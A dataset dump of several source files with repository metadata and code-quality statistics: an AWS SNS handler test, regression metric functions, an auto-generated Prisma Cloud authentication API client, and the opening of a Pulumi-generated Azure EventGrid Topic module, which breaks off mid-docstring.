hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e82f5ac6e1447b5a100bb82290599b73cef9922f
| 3,268
|
py
|
Python
|
test/notifications/test_sns_handler.py
|
oslokommune/okdata-event-stream-api
|
42d4c35a30ff784d00117e2d75078699abb7640e
|
[
"MIT"
] | 1
|
2021-09-09T11:43:41.000Z
|
2021-09-09T11:43:41.000Z
|
test/notifications/test_sns_handler.py
|
oslokommune/okdata-event-stream-api
|
42d4c35a30ff784d00117e2d75078699abb7640e
|
[
"MIT"
] | 4
|
2021-08-04T07:10:20.000Z
|
2022-03-30T14:14:14.000Z
|
test/notifications/test_sns_handler.py
|
oslokommune/okdata-event-stream-api
|
42d4c35a30ff784d00117e2d75078699abb7640e
|
[
"MIT"
] | null | null | null |
import notifications.sns_handler as sns_handler
import pytest
from unittest.mock import ANY
from services import CfStatusService
stack_name = "event-stream-dataset-id-1"
message_create_complete = f"StackId='arn:aws:cloudformation:eu-west-1:123456789000:stack/{stack_name}/c4387bb0-37d1-11ea-9fc9-0a1dada20d7a'\nTimestamp='2020-01-15T20:01:06.861Z'\nEventId='c4396610-37d1-11ea-9fc9-0a1dada20d7a'\nLogicalResourceId='{stack_name}'\nNamespace='123456789000'\nPhysicalResourceId='arn:aws:cloudformation:eu-west-1:123456789000:stack/{stack_name}/c4387bb0-37d1-11ea-9fc9-0a1dada20d7a'\nPrincipalId='ABCDEFGHIJKLMNOPQRSTU:stream-manager-dev-create-stream'\nResourceStatus='CREATE_COMPLETE'\nResourceStatusReason='User Initiated'\nResourceType='AWS::CloudFormation::Stack'\nStackName='{stack_name}'\nClientRequestToken='null'\n"
message_delete_complete = f"StackId='arn:aws:cloudformation:eu-west-1:123456789000:stack/{stack_name}/c4387bb0-37d1-11ea-9fc9-0a1dada20d7a'\nTimestamp='2020-01-15T20:01:06.861Z'\nEventId='c4396610-37d1-11ea-9fc9-0a1dada20d7a'\nLogicalResourceId='{stack_name}'\nNamespace='123456789000'\nPhysicalResourceId='arn:aws:cloudformation:eu-west-1:123456789000:stack/{stack_name}/c4387bb0-37d1-11ea-9fc9-0a1dada20d7a'\nPrincipalId='ABCDEFGHIJKLMNOPQRSTU:stream-manager-dev-create-stream'\nResourceStatus='DELETE_COMPLETE'\nResourceStatusReason='User Initiated'\nResourceType='AWS::CloudFormation::Stack'\nStackName='{stack_name}'\nClientRequestToken='null'\n"
message_rollback_complete = f"StackId='arn:aws:cloudformation:eu-west-1:123456789000:stack/{stack_name}/c4387bb0-37d1-11ea-9fc9-0a1dada20d7a'\nTimestamp='2020-01-15T20:01:06.861Z'\nEventId='c4396610-37d1-11ea-9fc9-0a1dada20d7a'\nLogicalResourceId='{stack_name}'\nNamespace='123456789000'\nPhysicalResourceId='arn:aws:cloudformation:eu-west-1:123456789000:stack/{stack_name}/c4387bb0-37d1-11ea-9fc9-0a1dada20d7a'\nPrincipalId='ABCDEFGHIJKLMNOPQRSTU:stream-manager-dev-create-stream'\nResourceStatus='ROLLBACK_COMPLETE'\nResourceStatusReason='User Initiated'\nResourceType='AWS::CloudFormation::Stack'\nStackName='{stack_name}'\nClientRequestToken='null'\n"
def generate_sns_event(message):
return {"Records": [{"Sns": {"Message": message}}]}
def test_handle_create_complete(mock_cf_status_service):
sns_handler.handle(generate_sns_event(message_create_complete), {})
CfStatusService.update_status.assert_called_once_with(
self=ANY, stack_name=stack_name, cf_status="ACTIVE"
)
def test_handle_rollback_complete(mock_cf_status_service):
sns_handler.handle(generate_sns_event(message_rollback_complete), {})
CfStatusService.update_status.assert_called_once_with(
self=ANY, stack_name=stack_name, cf_status="OPERATION_FAILED"
)
def test_handle_delete_complete(mock_cf_status_service):
sns_handler.handle(generate_sns_event(message_delete_complete), {})
CfStatusService.update_status.assert_called_once_with(
self=ANY, stack_name=stack_name, cf_status="INACTIVE"
)
@pytest.fixture()
def mock_cf_status_service(monkeypatch, mocker):
def update_status(self, stack_name, cf_status):
return
monkeypatch.setattr(CfStatusService, "update_status", update_status)
mocker.spy(CfStatusService, "update_status")
| 69.531915
| 655
| 0.814565
| 399
| 3,268
| 6.446115
| 0.213033
| 0.069984
| 0.041991
| 0.083981
| 0.790435
| 0.790435
| 0.790435
| 0.790435
| 0.790435
| 0.790435
| 0
| 0.10511
| 0.053856
| 3,268
| 46
| 656
| 71.043478
| 0.726714
| 0
| 0
| 0.096774
| 0
| 0.096774
| 0.601591
| 0.578335
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.193548
| false
| 0
| 0.129032
| 0.064516
| 0.387097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c035e0a2116f2c2fdeea29cffd5e6c3218db07e
| 1,446
|
py
|
Python
|
Src/Evaluator.py
|
denisuzhva/ML_task2
|
49220c370256be66a7e3eb98ae069259aa2f48fc
|
[
"MIT"
] | null | null | null |
Src/Evaluator.py
|
denisuzhva/ML_task2
|
49220c370256be66a7e3eb98ae069259aa2f48fc
|
[
"MIT"
] | null | null | null |
Src/Evaluator.py
|
denisuzhva/ML_task2
|
49220c370256be66a7e3eb98ae069259aa2f48fc
|
[
"MIT"
] | null | null | null |
import numpy as np
def mseMetric(fx_batch, z_batch):
batch_size = fx_batch.shape[0]
metric = np.sum(np.square(z_batch - fx_batch)) / batch_size
return metric
def rmseMetric(fx_batch, z_batch):
batch_size = fx_batch.shape[0]
metric = np.sum(np.square(z_batch - fx_batch)) / batch_size
return np.sqrt(metric)
def r2Metric(fx_batch, z_batch):
batch_size = fx_batch.shape[0]
mse_metric = np.sum(np.square(z_batch - fx_batch)) / batch_size
metric = 1 - mse_metric / (np.sum(np.square(z_batch - np.mean(z_batch))) / batch_size)
return metric
# with regularization
def mseMetricReg(fx_batch, z_batch, weights, order=2):
batch_size = fx_batch.shape[0]
metric = np.sum(np.square(z_batch - fx_batch)) / batch_size
metric = metric + np.linalg.norm(weights, order)
return metric
def rmseMetricReg(fx_batch, z_batch, weights, order=2):
batch_size = fx_batch.shape[0]
metric = np.sum(np.square(z_batch - fx_batch)) / batch_size
metric = metric + np.linalg.norm(weights, order)
return np.sqrt(metric)
def r2MetricReg(fx_batch, z_batch, weights, order=2):
batch_size = fx_batch.shape[0]
mse_metric = np.sum(np.square(z_batch - fx_batch)) / batch_size
mse_metric = mse_metric + np.linalg.norm(weights, order)
metric = 1 - mse_metric / (np.sum(np.square(z_batch - np.mean(z_batch))) / batch_size)
return metric
| 30.765957
| 91
| 0.67704
| 226
| 1,446
| 4.09292
| 0.141593
| 0.136216
| 0.166486
| 0.112432
| 0.863784
| 0.824865
| 0.792432
| 0.792432
| 0.792432
| 0.792432
| 0
| 0.011304
| 0.204703
| 1,446
| 46
| 92
| 31.434783
| 0.793043
| 0.01314
| 0
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.033333
| 0
| 0.433333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c50123e7a546c57ccf90e83f1a54044c48948ee
| 107
|
py
|
Python
|
oldtoronto/utils/generators.py
|
patcon/oldto
|
44c099550a4e3cfafa85afbaebd3cd6c33325891
|
[
"Apache-2.0"
] | 22
|
2018-04-25T22:03:53.000Z
|
2021-07-13T18:43:23.000Z
|
oldtoronto/utils/generators.py
|
patcon/oldto
|
44c099550a4e3cfafa85afbaebd3cd6c33325891
|
[
"Apache-2.0"
] | 17
|
2018-04-30T14:04:08.000Z
|
2022-02-13T19:52:44.000Z
|
oldtoronto/utils/generators.py
|
patcon/oldto
|
44c099550a4e3cfafa85afbaebd3cd6c33325891
|
[
"Apache-2.0"
] | 7
|
2018-05-08T23:32:44.000Z
|
2022-01-27T17:49:30.000Z
|
import json
def read_ndjson_file(input_file):
return (json.loads(line) for line in open(input_file))
| 17.833333
| 58
| 0.757009
| 18
| 107
| 4.277778
| 0.722222
| 0.233766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149533
| 107
| 5
| 59
| 21.4
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
1c6d2685fbd44d9502d0d71891188f88ebe97e2a
| 18,206
|
py
|
Python
|
openapi_client/api/authenticate_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
openapi_client/api/authenticate_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
openapi_client/api/authenticate_api.py
|
hi-artem/twistlock-py
|
9888e905f5b9d3cc00f9b84244588c0992f8e4f4
|
[
"RSA-MD"
] | null | null | null |
# coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class AuthenticateApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def api_v1_authenticate_identity_redirect_url_get(self, **kwargs): # noqa: E501
"""api_v1_authenticate_identity_redirect_url_get # noqa: E501
IdentityRedirectURL returns the redirect URL for the given authentication provider # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_authenticate_identity_redirect_url_get(async_req=True)
>>> result = thread.get()
:param type: Type is the auth provider type.
:type type: str
:param redirect: Redirect will redirect to the specified identity provider authentication flow.
:type redirect: bool
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: IdentityRedirectURLResponse
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_authenticate_identity_redirect_url_get_with_http_info(**kwargs) # noqa: E501
def api_v1_authenticate_identity_redirect_url_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_authenticate_identity_redirect_url_get # noqa: E501
IdentityRedirectURL returns the redirect URL for the given authentication provider # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_authenticate_identity_redirect_url_get_with_http_info(async_req=True)
>>> result = thread.get()
:param type: Type is the auth provider type.
:type type: str
:param redirect: Redirect will redirect to the specified identity provider authentication flow.
:type redirect: bool
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(IdentityRedirectURLResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'type',
'redirect'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_authenticate_identity_redirect_url_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'type' in local_var_params and local_var_params['type'] is not None: # noqa: E501
query_params.append(('type', local_var_params['type'])) # noqa: E501
if 'redirect' in local_var_params and local_var_params['redirect'] is not None: # noqa: E501
query_params.append(('redirect', local_var_params['redirect'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "IdentityRedirectURLResponse",
}
return self.api_client.call_api(
'/api/v1/authenticate/identity-redirect-url', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_authenticate_post(self, **kwargs): # noqa: E501
"""api_v1_authenticate_post # noqa: E501
Authenticate is the authentication endpoint # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_authenticate_post(async_req=True)
>>> result = thread.get()
:param api_authentication_request:
:type api_authentication_request: ApiAuthenticationRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: TypesAuthenticationResponse
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_authenticate_post_with_http_info(**kwargs) # noqa: E501
def api_v1_authenticate_post_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_authenticate_post # noqa: E501
Authenticate is the authentication endpoint # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_authenticate_post_with_http_info(async_req=True)
>>> result = thread.get()
:param api_authentication_request:
:type api_authentication_request: ApiAuthenticationRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(TypesAuthenticationResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'api_authentication_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_authenticate_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'api_authentication_request' in local_var_params:
body_params = local_var_params['api_authentication_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "TypesAuthenticationResponse",
}
return self.api_client.call_api(
'/api/v1/authenticate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def api_v1_authenticate_renew_get(self, **kwargs): # noqa: E501
"""api_v1_authenticate_renew_get # noqa: E501
RenewToken renews the JWT token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_authenticate_renew_get(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: TypesAuthenticationResponse
"""
kwargs['_return_http_data_only'] = True
return self.api_v1_authenticate_renew_get_with_http_info(**kwargs) # noqa: E501
def api_v1_authenticate_renew_get_with_http_info(self, **kwargs): # noqa: E501
"""api_v1_authenticate_renew_get # noqa: E501
RenewToken renews the JWT token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_v1_authenticate_renew_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(TypesAuthenticationResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method api_v1_authenticate_renew_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "TypesAuthenticationResponse",
}
return self.api_client.call_api(
'/api/v1/authenticate/renew', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 41.852874
| 124
| 0.607108
| 1,979
| 18,206
| 5.301668
| 0.098535
| 0.031262
| 0.046702
| 0.030881
| 0.906881
| 0.90326
| 0.902307
| 0.899733
| 0.879909
| 0.87581
| 0
| 0.013789
| 0.326815
| 18,206
| 434
| 125
| 41.949309
| 0.842281
| 0.507305
| 0
| 0.688525
| 1
| 0
| 0.159418
| 0.068509
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038251
| false
| 0
| 0.027322
| 0
| 0.103825
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c803fe0930699e623afcbbb3a12718809dd5fb9
| 155
|
py
|
Python
|
example/configs.py
|
transformerzhou/REDN
|
76b038702e7f7a7b7dd4f56020c825035a0f6843
|
[
"MIT"
] | null | null | null |
example/configs.py
|
transformerzhou/REDN
|
76b038702e7f7a7b7dd4f56020c825035a0f6843
|
[
"MIT"
] | null | null | null |
example/configs.py
|
transformerzhou/REDN
|
76b038702e7f7a7b7dd4f56020c825035a0f6843
|
[
"MIT"
] | null | null | null |
rootpath="/content/drive/My Drive/myfile/REDN/data/webnlg"
modelpath="/content/drive/My Drive/myfile/RTE-test/cased_L-12_H-768_A-12"
outputname='Newmodel'
| 38.75
| 73
| 0.8
| 26
| 155
| 4.653846
| 0.730769
| 0.198347
| 0.231405
| 0.31405
| 0.413223
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046667
| 0.032258
| 155
| 3
| 74
| 51.666667
| 0.76
| 0
| 0
| 0
| 0
| 0.333333
| 0.748387
| 0.464516
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c80d726f93f93d3e561f5503b7b112c92cf042d
| 38,473
|
py
|
Python
|
sdk/python/pulumi_azure/eventgrid/topic.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/eventgrid/topic.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/eventgrid/topic.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['TopicArgs', 'Topic']
@pulumi.input_type
class TopicArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
identity: Optional[pulumi.Input['TopicIdentityArgs']] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]]] = None,
input_mapping_default_values: Optional[pulumi.Input['TopicInputMappingDefaultValuesArgs']] = None,
input_mapping_fields: Optional[pulumi.Input['TopicInputMappingFieldsArgs']] = None,
input_schema: Optional[pulumi.Input[str]] = None,
local_auth_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Topic resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input['TopicIdentityArgs'] identity: An `identity` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input['TopicInboundIpRuleArgs']]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input['TopicInputMappingDefaultValuesArgs'] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
